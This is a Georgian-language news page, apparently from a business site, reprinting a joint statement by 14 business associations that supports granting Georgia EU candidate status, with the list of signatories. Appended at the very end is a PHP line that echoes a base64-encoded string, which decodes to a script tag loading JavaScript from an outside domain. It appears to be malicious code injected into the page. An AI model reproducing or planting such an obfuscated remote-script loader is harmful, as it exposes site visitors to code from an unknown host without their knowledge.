celsiusi
ავერსი საქკაბელი

საქართველოს 14-მა წამყვანმა ბიზნესასოციაციამ, ქვეყნისათვის ევროკავშირის კანდიდატის სტატუსის მინიჭების თაობაზე ერთობლივი განცხადება გააკეთა. განცხადებაში ასოციაციები ევროინტეგრაციის პროცესისადმი მხარდაჭერას გამოხატავენ.

WWW.BUSINESSTIME.GE განცხადებას უცვლელად გთავაზობთ:

“ჩვენ, ქვემოთ ჩამოთვლილი ბიზნესასოციაციები,

მივესალმებით ევროკომისიის ახლახან გაცემულ რეკომენდაციას, საქართველოსთვის ევროკავშირის კანდიდატის სტატუსის მინიჭების თაობაზე;

ვადასტურებთ ბიზნეს სექტორის მტკიცე მხარდაჭერას საქართველოს ევროინტეგრაციის მიმართ, რომელსაც აქვს განსაკუთრებული მნიშვნელობა ქვეყნის გრძელვადიანი სტაბილურობის, კეთილდღეობისა და განვითარებისთვის;

ვაცნობიერებთ, რომ ასოცირების შეთანხმება/ღრმა და ყოვლისმომცველი თავისუფალი ვაჭრობის შესახებ შეთანხმება და უვიზო მიმოსვლა წარმოადგენს საკვანძო ინსტრუმენტებს, რომელთა სრულად ათვისებაც უნდა მოხდეს ევროკავშირ-საქართველოს დაახლოების პროცესში;

მტკიცედ გვჯერა, რომ საქართველოსთვის ევროკავშირის კანდიდატის სტატუსის მინიჭება იქნება დადებითი გზავნილი აღმოსავლეთ პარტნიორობის წევრი რეგიონის სხვა ქვეყნებისთვის;

საქართველოში არსებული ბიზნეს სექტორი ვუერთდებით მოწოდებას, საქართველოსთვის ევროკავშირის კანდიდატის სტატუსის მინიჭების თაობაზე და მოველით, რომ ევროპული საბჭოს დეკემბრის გადაწყვეტილება კიდევ უფრო დააახლოებს ქვეყანას საბოლოო მიზანთან - ევროკავშირის წევრობასთან”, - ნათქვამია განცხადებაში.

მიმართვას ხელს აწერენ:

  • ევროკავშირი-საქართველოს ბიზნეს საბჭო
  • გერმანიის ეკონომიკური გაერთიანება
  • სავაჭრო და სამრეწველო პალატა - საფრანგეთი-საქართველო
  • ამერიკის სავაჭრო პალატა საქართველოში
  • საერთაშორისო სავაჭრო პალატა საქართველოში
  • ევროპული ბიზნეს ასოციაცია საქართველო
  • საქართველოს მწარმოებელთა ფედერაცია
  • საქართველოს დამსაქმებელთა ასოციაცია
  • გადასახადის გადამხდელთა კავშირი
  • საქართველოს დისტრიბუტორთა ბიზნეს ასოციაცია
  • საქართველოს ფერმერთა ასოციაცია
  • საქართველოს საბანკო ასოციაცია
  • საქართველო-რუმინეთის სავაჭრო პალატა
  • სლოვაკეთ-საქართველოს სავაჭრო პალატა
197
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");